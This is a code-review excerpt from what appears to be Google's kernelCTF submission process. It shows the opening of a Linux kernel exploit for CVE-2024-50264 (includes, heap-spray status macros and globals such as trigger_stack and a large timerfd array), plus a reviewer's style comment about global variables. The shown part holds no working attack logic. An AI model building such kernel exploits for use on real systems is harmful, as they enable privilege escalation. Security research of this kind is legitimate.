pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c

```diff
@@ -0,0 +1,851 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <linux/vm_sockets.h>
+#include <unistd.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <syscall.h>
+#include <stdarg.h>
+#include <sched.h>
+#include <signal.h>
+#include <time.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/times.h>
+#include <sys/timerfd.h>
+#include <sys/wait.h>
+#include <sys/socket.h>
+#include <stddef.h>
+#include <linux/types.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <syscall.h>
+#include <stdarg.h>
+#include <sched.h>
+#include <signal.h>
+#include <time.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/times.h>
+#include <sys/timerfd.h>
+#include <sys/wait.h>
+#include <sys/socket.h>
+#include <linux/prctl.h>
+#include <sys/prctl.h>
+#include <poll.h>
+#include <sys/epoll.h>
+#include <stdatomic.h>
+#include <linux/filter.h>
+#include <linux/seccomp.h>
+#include <sys/resource.h>
+#include <stddef.h>
+#include <keyutils.h>
+
+
+#include "modules/keyring.h"
+#include "modules/xattr.h"
+#include "modules/msg_msg.h"
+
+int* shared_mutex;
+
+
+#define FAIL_IF(x) if ((x)) { \
+        perror(#x); \
+        return -1; \
+}
+#define SPRAY_ERROR 0
+#define SPRAY_RETRY 1
+#define SPRAY_SUCCESS 2
+
+#define LAST_RESERVED_PORT 1023
+
+#define NS_PER_JIFFIE 1000000ull
+
+int cid_port_num = LAST_RESERVED_PORT;
+
+void *trigger_stack = NULL;
+void *heap_spray_stack = NULL;
+volatile int status_spray = SPRAY_ERROR;
+
+int timefds[0x500000];
```

Comment:
The following variables could've been local variables: `timefds`, `epfds`, `buf`, `targetstr`, move them into local functions. Read more here: https://google.github.io/security-research/kernelctf/style_guide#usage-of-global-variables-instead-of-local-ones